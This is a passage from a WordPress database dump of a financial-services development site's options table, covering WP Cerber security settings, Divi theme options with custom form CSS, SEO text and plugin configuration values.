\"slave_diag\";i:0;}','no'),(187,'_cerber_up','a:2:{s:1:\"v\";s:3:\"9.0\";s:1:\"t\";i:1679252090;}','no'),(188,'cerber_admin_info','<h1>Highlights from WP Cerber Security 9.0</h1><ul><li>New: Different <a href=\"https://wpcerber.com/wordpress-notifications-made-easy/\" target=\"_blank\">alerts</a> can be sent through different channels. You can select delivering notifications through Pushbullet and email simultaneously, Pushbullet only, or email only. The settings are configured on a per-alert basis in the alert creation form.</li><li>New: Implemented a new &quot;Message format&quot; feature and setting. You can reduce the number of links in WP Cerber’s messages or disable them completely to prevent sending sensitive data.</li><li>New: Implemented separate rate limiting settings for email and <a href=\"https://wpcerber.com/wordpress-mobile-and-browser-notifications-pushbullet/\" target=\"_blank\">Pushbullet notifications</a>.</li><li>New: Lockout notifications and appropriate threshold can be enabled for Pushbullet and emails separately.</li><li>New: Email reports and alerts can be sent via a separate SMTP server configured in the WP Cerber settings.</li><li>New: Implemented masking IP addresses and usernames (logins) in emails and mobile alerts.</li><li>New: Disabling login language switcher. If enabled, removes language switcher on the standard WordPress login page introduced in WordPress 5.9.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=9.0\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/evaluate/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(15866,'_site_transient_timeout_cerber_hourly_2','1681931482','no'),(15867,'_site_transient_cerber_hourly_2','a:2:{i:0;i:1681924281;i:1;i:1681924282;}','no'),(195,'_site_transient_timeout_cerber_daily_1','1682044270','no'),(196,'_site_transient_cerber_daily_1','a:2:{i:0;i:1681871470;i:1;i:1681871470;}','no'),(15864,'_site_transient_timeout_cerber_hourly_1','1681930876','no'),(15865,'_site_transient_cerber_hourly_1','a:2:{i:0;i:1681923676;i:1;i:1681923676;}','no'),(1922,'recovery_mode_email_last_sent','1681919788','yes'),(10380,'gform_email_count','13','yes'),(10381,'gform_upload_page_slug','93e3318b2e7f2f4','yes'),(206,'cerber_configuration','a:39:{s:9:\"boot-mode\";s:1:\"0\";s:8:\"attempts\";s:1:\"2\";s:7:\"lockout\";s:2:\"60\";s:10:\"aggressive\";s:0:\"\";s:10:\"limitwhite\";s:0:\"\";s:9:\"loginnowp\";s:1:\"0\";s:11:\"nologinhint\";s:0:\"\";s:10:\"nopasshint\";s:0:\"\";s:11:\"nologinlang\";s:0:\"\";s:9:\"loginpath\";s:13:\"the-wild-hunt\";s:13:\"logindeferred\";s:0:\"\";s:10:\"noredirect\";s:0:\"\";s:8:\"nonusers\";s:0:\"\";s:7:\"wplogin\";s:0:\"\";s:6:\"subnet\";s:0:\"\";s:5:\"proxy\";s:0:\"\";s:10:\"cookiepref\";s:0:\"\";s:7:\"page404\";s:1:\"0\";s:10:\"citadel_on\";s:1:\"1\";s:7:\"citadel\";s:0:\"\";s:10:\"ciduration\";s:2:\"60\";s:8:\"cinotify\";s:0:\"\";s:7:\"keeplog\";s:2:\"30\";s:12:\"keeplog_auth\";s:2:\"30\";s:9:\"cerberlab\";s:1:\"1\";s:11:\"cerberproto\";s:1:\"0\";s:7:\"usefile\";s:0:\"\";s:8:\"ip_extra\";s:0:\"\";s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";s:0:\"\";s:10:\"admin_lang\";s:0:\"\";s:14:\"top_admin_menu\";s:0:\"\";s:14:\"no_white_my_ip\";s:0:\"\";s:6:\"period\";s:2:\"30\";s:8:\"agperiod\";s:2:\"24\";s:7:\"aglocks\";s:1:\"2\";s:6:\"aglast\";s:1:\"4\";s:7:\"cilimit\";s:3:\"200\";s:8:\"ciperiod\";s:2:\"15\";}','no'),(234,'current_theme','Divi','yes'),(235,'theme_mods_Divi','a:6:{i:0;b:0;s:18:\"custom_css_post_id\";i:35;s:16:\"et_pb_css_synced\";s:3:\"yes\";s:18:\"nav_menu_locations\";a:3:{s:12:\"primary-menu\";i:4;s:11:\"footer-menu\";i:4;s:14:\"secondary-menu\";i:4;}s:39:\"et_updated_layouts_built_for_post_types\";s:3:\"yes\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1677858504;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:9:\"sidebar-6\";a:0:{}s:9:\"sidebar-7\";a:0:{}}}}','yes'),(236,'theme_switched','','yes'),(237,'et_pb_cache_notice','a:1:{s:6:\"4.20.0\";s:6:\"ignore\";}','yes'),(242,'et_core_version','4.20.4','yes'),(244,'et_divi','a:190:{s:39:\"static_css_custom_css_safety_check_done\";b:1;s:29:\"presets_storage_migrated_flag\";b:1;s:39:\"builder_global_presets_history_migrated\";b:1;s:23:\"2_5_flush_rewrite_rules\";s:4:\"done\";s:30:\"et_flush_rewrite_rules_library\";s:6:\"4.20.4\";s:31:\"divi_previous_installed_version\";s:6:\"4.20.2\";s:29:\"divi_latest_installed_version\";s:6:\"4.20.4\";s:27:\"divi_skip_font_subset_force\";b:1;s:27:\"et_pb_clear_templates_cache\";b:1;s:23:\"builder_custom_defaults\";O:8:\"stdClass\":0:{}s:33:\"customizer_settings_migrated_flag\";b:1;s:34:\"builder_custom_defaults_unmigrated\";b:0;s:40:\"divi_email_provider_credentials_migrated\";b:1;s:29:\"custom_defaults_migrated_flag\";b:1;s:15:\"divi_1_3_images\";s:7:\"checked\";s:21:\"et_pb_layouts_updated\";b:1;s:30:\"library_removed_legacy_layouts\";b:1;s:30:\"divi_2_4_documentation_message\";s:9:\"triggered\";s:19:\"product_tour_status\";a:3:{i:1;s:3:\"off\";i:2;s:3:\"off\";i:3;s:3:\"off\";}s:24:\"footer_widget_text_color\";s:7:\"#ffffff\";s:24:\"footer_widget_link_color\";s:7:\"#ffffff\";s:12:\"heading_font\";s:9:\"Open Sans\";s:12:\"divi_favicon\";s:0:\"\";s:27:\"et_pb_post_type_integration\";a:3:{s:4:\"post\";s:2:\"on\";s:4:\"page\";s:2:\"on\";s:7:\"project\";s:2:\"on\";}s:21:\"et_pb_static_css_file\";s:2:\"on\";s:19:\"et_pb_css_in_footer\";s:2:\"on\";s:25:\"et_pb_product_tour_global\";s:2:\"on\";s:24:\"et_enable_classic_editor\";s:2:\"on\";s:32:\"et_fb_pref_settings_bar_location\";s:6:\"bottom\";s:28:\"et_fb_pref_builder_animation\";s:4:\"true\";s:41:\"et_fb_pref_builder_display_modal_settings\";s:5:\"false\";s:39:\"et_fb_pref_builder_enable_dummy_content\";s:4:\"true\";s:46:\"et_fb_pref_builder_enable_visual_theme_builder\";s:4:\"true\";s:21:\"et_fb_pref_event_mode\";s:5:\"hover\";s:28:\"et_fb_pref_limited_view_mode\";s:9:\"wireframe\";s:32:\"et_fb_pref_hide_disabled_modules\";s:5:\"false\";s:28:\"et_fb_pref_history_intervals\";i:1;s:29:\"et_fb_pref_page_creation_flow\";s:7:\"default\";s:42:\"et_fb_pref_quick_actions_always_start_with\";s:7:\"nothing\";s:44:\"et_fb_pref_quick_actions_show_recent_queries\";s:3:\"off\";s:39:\"et_fb_pref_quick_actions_recent_queries\";s:0:\"\";s:40:\"et_fb_pref_quick_actions_recent_category\";s:0:\"\";s:35:\"et_fb_pref_limited_modal_preference\";s:7:\"default\";s:30:\"et_fb_pref_modal_snap_location\";s:0:\"\";s:21:\"et_fb_pref_modal_snap\";s:5:\"false\";s:27:\"et_fb_pref_modal_fullscreen\";s:5:\"false\";s:32:\"et_fb_pref_modal_dimension_width\";i:400;s:33:\"et_fb_pref_modal_dimension_height\";i:400;s:27:\"et_fb_pref_modal_position_x\";i:20;s:27:\"et_fb_pref_modal_position_y\";i:35;s:32:\"et_fb_pref_limited_toolbar_click\";s:5:\"false\";s:34:\"et_fb_pref_limited_toolbar_desktop\";s:4:\"true\";s:31:\"et_fb_pref_limited_toolbar_grid\";s:5:\"false\";s:32:\"et_fb_pref_limited_toolbar_hover\";s:5:\"false\";s:32:\"et_fb_pref_limited_toolbar_phone\";s:4:\"true\";s:33:\"et_fb_pref_limited_toolbar_tablet\";s:4:\"true\";s:36:\"et_fb_pref_limited_toolbar_wireframe\";s:4:\"true\";s:31:\"et_fb_pref_limited_toolbar_zoom\";s:4:\"true\";s:36:\"et_fb_pref_lv_modal_dimension_height\";i:0;s:35:\"et_fb_pref_lv_modal_dimension_width\";i:0;s:30:\"et_fb_pref_lv_modal_position_x\";i:0;s:30:\"et_fb_pref_lv_modal_position_y\";i:0;s:34:\"et_fb_pref_responsive_tablet_width\";i:768;s:35:\"et_fb_pref_responsive_tablet_height\";i:0;s:33:\"et_fb_pref_responsive_phone_width\";i:400;s:34:\"et_fb_pref_responsive_phone_height\";i:0;s:35:\"et_fb_pref_responsive_minimum_width\";i:320;s:35:\"et_fb_pref_responsive_maximum_width\";i:980;s:12:\"accent_color\";s:7:\"#666666\";s:17:\"use_sidebar_width\";b:1;s:10:\"link_color\";s:7:\"#4e72d0\";s:9:\"divi_logo\";s:118:\"http://cmdev-site1.com/wp-content/uploads/2023/02/J-Sutton-Financial-Houston-Skyline-w-white-logo-edited-2-28-2023.jpg\";s:14:\"divi_fixed_nav\";s:2:\"on\";s:26:\"divi_gallery_layout_enable\";s:2:\"on\";s:18:\"divi_color_palette\";s:63:\"#000000|#ffffff|#e02b20|#e09900|#edf000|#7cda24|#0c71c3|#8300e9\";s:15:\"divi_grab_image\";s:5:\"false\";s:15:\"divi_blog_style\";s:5:\"false\";s:12:\"divi_sidebar\";s:16:\"et_right_sidebar\";s:22:\"divi_shop_page_sidebar\";s:16:\"et_right_sidebar\";s:30:\"et_google_api_settings_api_key\";s:0:\"\";s:19:\"et_use_google_fonts\";s:2:\"on\";s:33:\"divi_gf_enable_all_character_sets\";s:2:\"on\";s:29:\"et_enqueue_google_maps_script\";s:2:\"on\";s:23:\"divi_show_facebook_icon\";s:2:\"on\";s:22:\"divi_show_twitter_icon\";s:2:\"on\";s:24:\"divi_show_instagram_icon\";s:5:\"false\";s:18:\"divi_show_rss_icon\";s:2:\"on\";s:17:\"divi_facebook_url\";s:1:\"#\";s:16:\"divi_twitter_url\";s:1:\"#\";s:18:\"divi_instagram_url\";s:1:\"#\";s:12:\"divi_rss_url\";s:0:\"\";s:34:\"divi_woocommerce_archive_num_posts\";i:9;s:17:\"divi_catnum_posts\";i:6;s:21:\"divi_archivenum_posts\";i:5;s:20:\"divi_searchnum_posts\";i:5;s:17:\"divi_tagnum_posts\";i:5;s:16:\"divi_date_format\";s:6:\"M j, Y\";s:16:\"divi_use_excerpt\";s:5:\"false\";s:16:\"divi_back_to_top\";s:2:\"on\";s:18:\"divi_smooth_scroll\";s:2:\"on\";s:25:\"divi_disable_translations\";s:5:\"false\";s:29:\"divi_enable_responsive_images\";s:2:\"on\";s:15:\"divi_custom_css\";s:4970:\".gform_wrapper.gravity-theme .gform_footer button, .gform_wrapper.gravity-theme .gform_footer input {color: #FFFFFF!important;\r\n    border-width: 0px!important;\r\n    border-color: RGBA(255,255,255,0);\r\n    border-radius: 14px;\r\n    font-size: 20px;\r\n    background-color: #003372;\r\n	padding: 10px 15px 15px 10px;\r\n}\r\n.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}\";s:29:\"divi_dynamic_module_framework\";s:2:\"on\";s:16:\"divi_dynamic_css\";s:2:\"on\";s:18:\"divi_dynamic_icons\";s:2:\"on\";s:22:\"divi_inline_stylesheet\";s:2:\"on\";s:17:\"divi_critical_css\";s:2:\"on\";s:30:\"divi_critical_threshold_height\";s:6:\"Medium\";s:25:\"divi_dynamic_js_libraries\";s:2:\"on\";s:19:\"divi_disable_emojis\";s:2:\"on\";s:20:\"divi_defer_block_css\";s:2:\"on\";s:24:\"divi_google_fonts_inline\";s:5:\"false\";s:51:\"divi_limit_google_fonts_support_for_legacy_browsers\";s:2:\"on\";s:23:\"divi_enable_jquery_body\";s:2:\"on\";s:32:\"divi_enable_jquery_compatibility\";s:2:\"on\";s:29:\"divi_enable_jquery_body_super\";s:5:\"false\";s:21:\"divi_enable_dropdowns\";s:2:\"on\";s:14:\"divi_home_link\";s:2:\"on\";s:15:\"divi_sort_pages\";s:10:\"post_title\";s:15:\"divi_order_page\";s:3:\"asc\";s:22:\"divi_tiers_shown_pages\";i:3;s:32:\"divi_enable_dropdowns_categories\";s:2:\"on\";s:21:\"divi_categories_empty\";s:2:\"on\";s:27:\"divi_tiers_shown_categories\";i:3;s:13:\"divi_sort_cat\";s:4:\"name\";s:14:\"divi_order_cat\";s:3:\"asc\";s:20:\"divi_disable_toptier\";s:5:\"false\";s:14:\"divi_postinfo2\";a:2:{i:0;s:4:\"date\";i:1;s:10:\"categories\";}s:22:\"divi_show_postcomments\";s:5:\"false\";s:15:\"divi_thumbnails\";s:2:\"on\";s:20:\"divi_page_thumbnails\";s:5:\"false\";s:23:\"divi_show_pagescomments\";s:5:\"false\";s:14:\"divi_postinfo1\";a:2:{i:0;s:4:\"date\";i:1;s:10:\"categories\";}s:21:\"divi_thumbnails_index\";s:2:\"on\";s:19:\"divi_seo_home_title\";s:2:\"on\";s:25:\"divi_seo_home_description\";s:2:\"on\";s:22:\"divi_seo_home_keywords\";s:2:\"on\";s:23:\"divi_seo_home_canonical\";s:5:\"false\";s:23:\"divi_seo_home_titletext\";s:36:\"J. Sutton Financial - Life Insurance\";s:29:\"divi_seo_home_descriptiontext\";s:90:\"We provide high quality life insurance policies to Texans from our home in Houston, Texas.\";s:26:\"divi_seo_home_keywordstext\";s:46:\"Life Insurance, Houston, J. Sutton Financial, \";s:18:\"divi_seo_home_type\";s:27:\"BlogName | Blog description\";s:22:\"divi_seo_home_separate\";s:3:\" | \";s:21:\"divi_seo_single_title\";s:5:\"false\";s:27:\"divi_seo_single_description\";s:5:\"false\";s:24:\"divi_seo_single_keywords\";s:5:\"false\";s:25:\"divi_seo_single_canonical\";s:5:\"false\";s:27:\"divi_seo_single_field_title\";s:9:\"seo_title\";s:33:\"divi_seo_single_field_description\";s:15:\"seo_description\";s:30:\"divi_seo_single_field_keywords\";s:12:\"seo_keywords\";s:20:\"divi_seo_single_type\";s:21:\"Post title | BlogName\";s:24:\"divi_seo_single_separate\";s:3:\" | \";s:24:\"divi_seo_index_canonical\";s:5:\"false\";s:26:\"divi_seo_index_description\";s:5:\"false\";s:19:\"divi_seo_index_type\";s:24:\"Category name | BlogName\";s:23:\"divi_seo_index_separate\";s:3:\" | \";s:28:\"divi_integrate_header_enable\";s:2:\"on\";s:26:\"divi_integrate_body_enable\";s:2:\"on\";s:31:\"divi_integrate_singletop_enable\";s:2:\"on\";s:34:\"divi_integrate_singlebottom_enable\";s:2:\"on\";s:21:\"divi_integration_head\";s:0:\"\";s:21:\"divi_integration_body\";s:0:\"\";s:27:\"divi_integration_single_top\";s:0:\"\";s:30:\"divi_integration_single_bottom\";s:0:\"\";s:37:\"et_automatic_updates_options_username\";s:0:\"\";s:36:\"et_automatic_updates_options_api_key\";s:0:\"\";s:15:\"divi_468_enable\";s:5:\"false\";s:14:\"divi_468_image\";s:0:\"\";s:12:\"divi_468_url\";s:0:\"\";s:16:\"divi_468_adsense\";s:0:\"\";s:20:\"et_fb_pref_view_mode\";s:7:\"desktop\";s:27:\"et_fb_pref_modal_preference\";s:7:\"default\";s:24:\"et_fb_pref_toolbar_click\";s:5:\"false\";s:26:\"et_fb_pref_toolbar_desktop\";s:4:\"true\";s:23:\"et_fb_pref_toolbar_grid\";s:5:\"false\";s:24:\"et_fb_pref_toolbar_hover\";s:5:\"false\";s:24:\"et_fb_pref_toolbar_phone\";s:4:\"true\";s:25:\"et_fb_pref_toolbar_tablet\";s:4:\"true\";s:28:\"et_fb_pref_toolbar_wireframe\";s:4:\"true\";s:23:\"et_fb_pref_toolbar_zoom\";s:4:\"true\";s:9:\"footer_bg\";s:7:\"#666666\";s:14:\"footer_columns\";s:1:\"1\";s:21:\"widget_body_font_size\";i:17;s:26:\"footer_widget_header_color\";s:7:\"#ffffff\";s:21:\"custom_footer_credits\";s:65:\"©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy\";s:27:\"bottom_bar_background_color\";s:7:\"#666666\";s:29:\"disable_custom_footer_credits\";b:0;s:24:\"show_footer_social_icons\";b:0;s:14:\"divi_menupages\";a:2:{i:0;i:225;i:1;i:3;}}','yes'),(245,'widget_aboutmewidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(246,'widget_adsensewidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(247,'widget_advwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(248,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"400\";s:4:\"crop\";i:1;}','yes'),(249,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"510\";s:6:\"height\";s:4:\"9999\";s:4:\"crop\";i:0;}','yes'),(250,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:3:\"157\";s:6:\"height\";s:3:\"157\";s:4:\"crop\";i:1;}','yes'),(251,'et_safe_mode_plugins_allowlist','a:8:{i:0;s:15:\"etdev/etdev.php\";i:1;s:15:\"bloom/bloom.php\";i:2;s:19:\"monarch/monarch.php\";i:3;s:29:\"divi-builder/divi-builder.php\";i:4;s:27:\"ari-adminer/ari-adminer.php\";i:5;s:31:\"query-monitor/query-monitor.php\";i:6;s:27:\"woocommerce/woocommerce.php\";i:7;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";}','yes'),(253,'et_images_temp_folder','/home/corrid11/cmdev-site1.com/wp-content/uploads/et_temp','yes'),(254,'et_schedule_clean_images_last_time','1681734731','yes'),(255,'et_bfb_settings','a:2:{s:10:\"enable_bfb\";s:2:\"on\";s:10:\"toggle_bfb\";s:2:\"on\";}','yes'),(257,'et_pb_builder_options','a:2:{i:0;b:0;s:35:\"email_provider_credentials_migrated\";b:1;}','yes'),(258,'et_divi_builder_global_presets_ng','O:8:\"stdClass\":1:{s:13:\"et_pb_section\";O:8:\"stdClass\":2:{s:7:\"presets\";O:8:\"stdClass\":1:{s:8:\"_initial\";O:8:\"stdClass\":5:{s:4:\"name\";s:16:\"Section Preset 1\";s:7:\"created\";i:0;s:7:\"updated\";i:0;s:7:\"version\";s:6:\"4.20.2\";s:8:\"settings\";O:8:\"stdClass\":0:{}}}s:7:\"default\";s:8:\"_initial\";}}','no'),(3740,'et_support_center_installed','true','yes'),(18997,'_transient_timeout_et_check_mod_pagespeed','1681953736','no'),(18998,'_transient_et_check_mod_pagespeed','','no'),(12520,'niteoCS_font_headings_variant[hardwork]','700','yes'),(12521,'niteoCS_font_headings[hardwork]','Playfair Display','yes'),(12522,'niteoCS_footer_background_opacity[hardwork]','0.4','yes'),(12547,'niteoCS_slider','0','yes'),(12548,'niteoCS_soc_title','GET SOCIAL WITH US','yes'),(12549,'niteoCS_socialmedia','[{\\\"name\\\":\\\"facebook\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":0},{\\\"name\\\":\\\"twitter\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":1},{\\\"name\\\":\\\"instagram\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":2},{\\\"name\\\":\\\"skype\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":3},{\\\"name\\\":\\\"500px\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":4},{\\\"name\\\":\\\"deviantart\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":5},{\\\"name\\\":\\\"behance\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":6},{\\\"name\\\":\\\"dribbble\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":7},{\\\"name\\\":\\\"pinterest\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":8},{\\\"name\\\":\\\"linkedin\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":9},{\\\"name\\\":\\\"tumblr\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":10},{\\\"name\\\":\\\"youtube\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":11},{\\\"name\\\":\\\"vimeo\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":12},{\\\"name\\\":\\\"flickr\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":13},{\\\"name\\\":\\\"soundcloud\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":14},{\\\"name\\\":\\\"vk\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":15},{\\\"name\\\":\\\"envelope-o\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":16},{\\\"name\\\":\\\"whatsapp\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":17},{\\\"name\\\":\\\"phone\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":18},{\\\"name\\\":\\\"telegram\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":19},{\\\"name\\\":\\\"xing\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":20},{\\\"name\\\":\\\"github\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":21},{\\\"name\\\":\\\"snapchat\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":22},{\\\"name\\\":\\\"spotify\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":23},{\\\"name\\\":\\\"discord\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":24},{\\\"name\\\":\\\"goodreads\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":25},{\\\"name\\\":\\\"rss\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":26},{\\\"